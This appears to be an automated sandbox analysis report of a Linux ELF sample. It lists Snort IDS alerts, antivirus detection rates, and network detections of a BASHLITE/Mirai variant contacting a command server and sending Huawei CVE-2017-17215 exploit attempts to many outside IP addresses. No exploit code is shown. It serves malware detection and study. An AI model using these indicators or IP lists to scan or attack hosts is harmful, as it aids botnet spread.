                Timestamp:06/14/24-10:44:00.336747
                SID:2835222
                Source Port:48832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647069
                SID:2835222
                Source Port:43852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472149
                SID:2835222
                Source Port:38692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849984
                SID:2835222
                Source Port:40760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966394
                SID:2829579
                Source Port:55368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146557
                SID:2835222
                Source Port:50826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421525
                SID:2829579
                Source Port:48068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765993
                SID:2829579
                Source Port:40420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917943
                SID:2829579
                Source Port:53910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023164
                SID:2829579
                Source Port:54590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243793
                SID:2829579
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804618
                SID:2835222
                Source Port:53078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861534
                SID:2835222
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988020
                SID:2829579
                Source Port:60108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293129
                SID:2835222
                Source Port:34480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517693
                SID:2835222
                Source Port:39222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977279
                SID:2835222
                Source Port:40540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151165
                SID:2829579
                Source Port:48266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902390
                SID:2829579
                Source Port:59618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985962
                SID:2835222
                Source Port:56432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010392
                SID:2829579
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846849
                SID:2835222
                Source Port:39828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180861
                SID:2835222
                Source Port:46306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689041
                SID:2835222
                Source Port:37972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411297
                SID:2835222
                Source Port:47474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518560
                SID:2835222
                Source Port:46502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616781
                SID:2829579
                Source Port:55414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967600
                SID:2835222
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367289
                SID:2835222
                Source Port:32968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273822
                SID:2835222
                Source Port:37090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645698
                SID:2835222
                Source Port:38090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687300
                SID:2829579
                Source Port:40960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451059
                SID:2835222
                Source Port:36890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643167
                SID:2829579
                Source Port:33566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779166
                SID:2829579
                Source Port:48494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772255
                SID:2835222
                Source Port:50792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276373
                SID:2835222
                Source Port:40458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505191
                SID:2835222
                Source Port:54934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071753
                SID:2829579
                Source Port:44002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.046007
                SID:2835222
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450602
                SID:2829579
                Source Port:36200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861652
                SID:2835222
                Source Port:58162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339630
                SID:2835222
                Source Port:59736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451879
                SID:2835222
                Source Port:33696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944090
                SID:2835222
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807048
                SID:2835222
                Source Port:43176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760034
                SID:2835222
                Source Port:44874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018820
                SID:2829579
                Source Port:32812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689197
                SID:2835222
                Source Port:54140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246272
                SID:2835222
                Source Port:49906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967847
                SID:2835222
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763851
                SID:2835222
                Source Port:51072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683152
                SID:2829579
                Source Port:49298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763500
                SID:2829579
                Source Port:40038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053230
                SID:2829579
                Source Port:34670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998672
                SID:2835222
                Source Port:51556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717183
                SID:2829579
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163226
                SID:2835222
                Source Port:38146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185416
                SID:2835222
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662165
                SID:2829579
                Source Port:35624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450387
                SID:2835222
                Source Port:40392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916644
                SID:2835222
                Source Port:39404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858343
                SID:2835222
                Source Port:60250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504013
                SID:2835222
                Source Port:32812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761629
                SID:2829579
                Source Port:51054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792668
                SID:2829579
                Source Port:45316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179807
                SID:2835222
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179684
                SID:2835222
                Source Port:47348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546143
                SID:2835222
                Source Port:57342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203235
                SID:2829579
                Source Port:49316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971683
                SID:2835222
                Source Port:37274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289836
                SID:2835222
                Source Port:53462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001273
                SID:2829579
                Source Port:46960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:21.346542
                SID:2840515
                Source Port:40468
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969593
                SID:2829579
                Source Port:53204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177752
                SID:2829579
                Source Port:35018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705543
                SID:2829579
                Source Port:52994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034500
                SID:2835222
                Source Port:46036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183003
                SID:2835222
                Source Port:38954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110656
                SID:2835222
                Source Port:55938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970681
                SID:2835222
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: hj3msRLZgi.elfAvira: detected
                Source: hj3msRLZgi.elfReversingLabs: Detection: 70%
                Source: hj3msRLZgi.elfVirustotal: Detection: 61%Perma Link
                Source: hj3msRLZgi.elfJoe Sandbox ML: detected

                Spreading

                barindex
                Source: /tmp/hj3msRLZgi.elf (PID: 5498)Opens: /proc/net/routeJump to behavior

                Networking

                barindex
                Source: TrafficSnort IDS: 2840515 ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586) 192.168.2.14:49610 -> 43.231.232.101:23
                Source: TrafficSnort IDS: 2840515 ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586) 192.168.2.14:49612 -> 43.231.232.101:23
                Source: TrafficSnort IDS: 2840516 ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message 43.231.232.101:23 -> 192.168.2.14:49612
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42152 -> 156.47.96.254:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42152 -> 156.47.96.254:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41766 -> 41.60.152.249:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41766 -> 41.60.152.249:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38568 -> 41.245.235.255:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38568 -> 41.245.235.255:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44308 -> 156.224.103.158:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44308 -> 156.224.103.158:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48390 -> 197.207.188.68:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48390 -> 197.207.188.68:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33534 -> 41.131.181.63:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33534 -> 41.131.181.63:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48242 -> 41.211.225.173:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48242 -> 41.211.225.173:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51456 -> 41.78.102.254:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51456 -> 41.78.102.254:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48092 -> 197.156.162.157:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48092 -> 197.156.162.157:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42714 -> 41.187.63.243:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42714 -> 41.187.63.243:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44950 -> 41.203.38.182:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44950 -> 41.203.38.182:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52254 -> 41.96.243.63:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52254 -> 41.96.243.63:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46224 -> 197.145.0.42:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46224 -> 197.145.0.42:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36432 -> 41.182.182.25:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36432 -> 41.182.182.25:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38014 -> 197.30.81.14:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38014 -> 197.30.81.14:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51116 -> 197.115.91.80:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51116 -> 197.115.91.80:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44796 -> 41.85.57.174:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44796 -> 41.85.57.174:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56634 -> 156.149.180.35:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56634 -> 156.149.180.35:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34334 -> 156.67.95.193:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34334 -> 156.67.95.193:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44826 -> 41.229.152.150:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44826 -> 41.229.152.150:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40200 -> 197.92.82.210:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40200 -> 197.92.82.210:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48698 -> 156.81.56.92:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48698 -> 156.81.56.92:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53984 -> 41.20.102.108:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53984 -> 41.20.102.108:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53186 -> 41.68.188.191:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53186 -> 41.68.188.191:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45986 -> 156.97.90.225:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45986 -> 156.97.90.225:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48094 -> 41.172.240.153:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48094 -> 41.172.240.153:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52526 -> 41.174.190.39:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52526 -> 41.174.190.39:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46264 -> 41.38.84.36:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46264 -> 41.38.84.36:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48308 -> 197.82.207.29:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48308 -> 197.82.207.29:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52628 -> 156.188.227.67:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52628 -> 156.188.227.67:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42150 -> 41.146.247.111:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42150 -> 41.146.247.111:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59112 -> 197.12.163.24:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59112 -> 197.12.163.24:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60186 -> 156.36.89.39:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60186 -> 156.36.89.39:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35988 -> 41.216.220.242:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35988 -> 41.216.220.242:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50920 -> 41.156.92.120:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50920 -> 41.156.92.120:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54966 -> 41.145.71.139:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54966 -> 41.145.71.139:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38104 -> 41.198.161.145:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38104 -> 41.198.161.145:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33966 -> 41.17.142.44:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33966 -> 41.17.142.44:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51980 -> 41.161.125.211:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51980 -> 41.161.125.211:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35038 -> 41.83.153.150:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35038 -> 41.83.153.150:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37936 -> 197.45.165.234:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37936 -> 197.45.165.234:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57034 -> 197.224.78.64:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57034 -> 197.224.78.64:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55210 -> 41.21.0.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55210 -> 41.21.0.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55782 -> 197.172.100.117:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55782 -> 197.172.100.117:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46730 -> 156.44.219.206:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46730 -> 156.44.219.206:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39392 -> 156.70.90.47:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39392 -> 156.70.90.47:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51512 -> 41.17.37.241:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51512 -> 41.17.37.241:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45438 -> 41.103.250.3:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45438 -> 41.103.250.3:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51424 -> 156.92.179.212:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51424 -> 156.92.179.212:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49176 -> 156.75.157.213:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49176 -> 156.75.157.213:37215
